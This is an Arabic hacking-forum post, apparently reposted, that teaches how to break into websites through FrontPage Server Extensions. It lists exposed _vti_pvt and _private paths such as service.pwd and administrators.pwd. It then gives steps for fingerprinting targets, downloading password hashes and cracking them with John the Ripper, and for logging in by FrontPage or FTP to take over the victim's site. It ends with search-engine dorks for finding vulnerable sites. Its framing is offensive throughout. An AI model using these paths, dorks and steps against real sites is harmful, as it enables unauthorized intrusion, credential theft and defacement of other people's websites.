اختراق موقع بثغره الفرونت بيج

[دراكولا الزمن]

الموضوع منقول....
........



ما هو الفرونت بيج
يعد فرونت بيج من أهم البرامج استخداماً في إنشاء صفحات الويب و اسهلها و اكثرها انتشارا
لكن فية ثغره قويه تمكنك من امتلاك موقع الضحيه .

***********************************************

شرح الثغره :

عند تنصيب برنامج فرونت بيج يقوم البرنامج باقامة فولدرات وهي :

vti_pvt_/(اخطرهم)
vti_txt_/
vti_cnf_/
vti_log_/
vti_bin_/
private_/

ملاحظة:--
تنفذ الثغرة على المواقع التي صممت بالفرونت بيج ولا تصلح لغيرها و هذا ثخرة اخرى لفرونت بيج

/_private/form_results.txt
/_private/form_results.htm
/_private/register.htm
/_vti_pvt/service.cnf
/_vti_pvt/service.stp
/_vti_pvt/services.cnf
/_vti_pvt/svcacl.cnf
/_vti_pvt/writeto.cnf
/_vti_pvt/access.cnf
/_vti_bin/_vti_aut/author.exe
/_vti_bin/_vti_aut/author.dll
/_vti_pvt/service.pwd
/_vti_pvt/users.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/administrators.pwd
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_vti_bin
/_vti_bin/_vti_adm
/_vti_bin/_vti_aut
/_vti_pvt/writeto.cnf
/_vti_pvt/svcacl.cnf
/_vti_pvt/services.cnf
/_vti_pvt/service.stp
/_vti_pvt/service.cnf
/_vti_pvt/access.cnf
/_private/registrations.txt
/_vti_bin/_vti_aut/dvwssr.dll
/_private/registrations.htm
/_private/register.txt
/_private/register.htm
/_private/orders.txt
/_private/orders.htm
/_private/form_results.htm
/_private/form_results.txt
/_vti_bin/_vti_adm/admin.dll


**********************************************

كيف تعلم ان موقع ما يدعم الفرونت بيج ؟؟؟؟؟؟؟؟؟

وذلك بعدة طرق :---

1-بالذهاب إلى موقع netcraft
http://www.netcraft.com
ستجد مربع على اليسار اكتب فيه اسم الموقع
مثال:www.baby hacker2005.com
واضغط انتر
وبعد البحث راح نشوف النتيجة التالية:
The site http://www.arank.com/ is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux
هنا يهمنا ثلاث اشياء:-
1- الملقم وهو:
apache 1.3.20
2- ودعم فرونت بيج
FrontPage/5.0.2.2510
3- النظام وهو
Linux


2-او عن طريق إضافة الجملة
vti_inf.html_/
بعد عنوان الموقع لنفرض أن الموقع:
http://www.baby hacker2005.com
نضيف الجملة ليصبح بهذه الطريقةhttp://www.baby hacker2005.com/_vti_inf.html
وبعدها اضغط Enter
وراح يطلعلك في أول الصفحة هذه الكلمة
Frontpage Configuration Information
أي قد تم تثبيت مجلدات وبرامج الفرونت بيج (يعني ان الموقع يدعم الفرونت بيج)


3-وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم لا
بإضافة
vti_cnf_/
بعد عنوان الموقع كهذا المثال:

http://www.baby hacker2005.com/_vti_cnf
واضغط زر الفأرة الأيمن واختار
source المصدر
وابحث عن
vti_generator:Programe
حيث
Programe تعني لنوع برنامج الفرونت بيج والإصدارات الخاصة به

**********************************
كيف يتم تطبيق الثغره ؟؟
الحين وبعد لما عرفنا ان الموقع يدعم frontpage كيف نقدر نوصل لملف الباسوورد؟

يعني وعلى سبيل المثال ان الموقع التالي
http://www.baby hacker2005.com
يدعم fontpage
طيب نذهب إلى ملف vti_pvt_
يعني كذا
http://www.baby hacker2005/_vti_pvt
وأول ماندخله نلاحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:

Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
ممكن ما تلاقيها بالضبط لكن شبيهة منها
*********************************************
ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلاحظ نلاحظ وجود
user**** : p***wd
اسم المستخدم والباسوورد
يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات
طلعلي ملف service يحتوي على user / p***word
وهذا مضمون الملف
baby hacker2005:hi9LHn9wAMuKM
حيث اسم المستخدم : baby hacker2005
الباسوورد المشفرة هي:hi9LHn9wAMuKM

***************************************

ألحين وعرفنا كيف نطلع الباسوورد المشفر ماباقي إلا نفك تشفيره
وهذا يتم ببرامج كثير

***** Jack

John The Ripper

راح نستخدم الأفضل والأكثر تداولا وهو John The Ripper و لي انا شرحتها
في منتديات دكتور ديث بالتفصيل+برنامج.........

***********************************************

إنت ألحين مستريح عندك user**** والـp***word
وش بقالك ؟!!
يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/
1-
frontpage
بعدين
file وتذهب إلى
open ***
وتحط الموقع فتطلعلك الصفحة الرئيسية فير اللي بدك اياه بعدين
save or publish
بعدين بيطلب منك كلمة السر والاسم طبعا الشغلة سهلة تحط الاسم وكلمة السر وتحط
sign

*********************

2-
من FTP
وعليك ببرامج الـFTP المنتشرة
كالـws-ftp
والـpro ftp

ويمكنك عمل الطريقة من DOS ولكن البرامج أسهل ...


وألحين أكيد تبون تجربون على مواقع بس ما تعرفون مواقع تدعم الفرونت بيج؟؟؟
أقولكم روحوا google(4)
http://www.google.com
واكتبوا في إطار البحث
vti_pvt_/
وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة
**************************
وعندك محرك بحث
http://www.altavista.com
تكتب في محرك البحث
link:service.pwd
أو
link:adminstrators
وغيرها من الملفات الاحتمال وجود p***word فيها

اتمنى ان وفقة في الشرح ......
_________________


The Man Of Another World



...شكرا